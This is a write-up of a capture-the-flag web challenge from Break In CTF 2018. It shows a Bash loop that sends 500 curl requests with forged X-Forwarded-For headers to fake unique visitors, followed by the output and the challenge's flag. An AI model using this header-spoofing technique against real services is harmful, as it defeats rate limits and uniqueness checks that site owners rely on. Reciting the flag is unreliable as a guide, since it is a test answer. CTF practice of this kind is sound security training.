Break In CTF 2018 - Aalekh and his business [500]
Aalekh and his business
https://felicity.iiit.ac.in/contest/breakin/questions/uuid/
First of all, maybe you need some reference before to solve this problem:
cURL, cURL request with Custom IP, Bash, IP Address Classful Network
Points: 500
Tags: xforwardedfor networking
Poll rating:
Aalekh joined IIIT in 2014. Soon, he started selling T-shirts and hoodies. One day, Aalekh got a big order and trusted his childhood friend to handle the order. But his friend betrayed him and sold bad pieces. College students got angry and tried to beat Aalekh up. His good friend, Anshul, wanted to save him. To prevent Aalekh from going under loss, he has to sell 500 T-shirts on the market, the only condition being, customers have to be unique.
Can you help Anshul sell 500 T-shirts?
https://felicity.iiit.ac.in/contest/breakin/questions/uuid/
Flag Format: BREAKIN{[0-9A-Za-z_]+}
When you open the problem , it will says:
Your UUID is: "5a7566bf7741f"
Click here to start hitting url.
You will be given UUID as unique token for you to using the website.
As you see you can use the same ip address to open the website, it just tell you the same thing:
Woah! New hit. Go ahead only 499 left
But when you use another IP Address it wil show you:
Woah! New hit. Go ahead only 498 left
It mean we need to open the website with another IP Address. So it's not ethical if we open the website and reboot the Router for using the another IP Address and open it up.
So that i am doing some research that we can use cURL to do request packet, and do spoofing IP Address, you can look at reference above.
-H/--header <header>
(HTTP) Extra header to use when getting a web page. You may
specify any number of extra headers. Note that if you should add
a custom header that has the same name as one of the internal
ones curl would use, your externally set header will be used
instead of the internal one. This allows you to make even
trickier stuff than curl would normally do. You should not
replace internally set headers without knowing perfectly well
what you’re doing. Remove an internal header by giving a
replacement without content on the right side of the colon,
as in: -H "Host:".
The website need us to open it as 500(Five Hundred times) phew.. you want to open it 500 hundred times? maybe it will be the "Barbaric Technique" but since we have computer why not computer to do that. LOL
500 - 2 = 498, 498 left.
Many Write-Up i read that they use Python as they're programming language but, me? I want to try using Bash.
!/bin/bash
for value1 in {1..2}
do
for value2 in {1..250}
do
curl --header "X-Forwarded-For: 1.2.$value1.$value2" "https://felicity.iiit.ac.in/contest/breakin/questions/uuid/hit/5a7566bf7741f/"
done
done
echo All Done Captain!
With luck and fast internet you will get the output.
Woah! New hit. Go ahead only 498 left
...
Woah! New hit. Go ahead only 2 left
Woah! New hit. Go ahead only 1 left
Woah! Do did it. Flag is BREAKIN{dhandhesebadhakoidharmnhihota}
Actually i finish this problem 3 times. because my INTERNET CONNECTION up to 9999 mb/s :) very fast. *Sarcas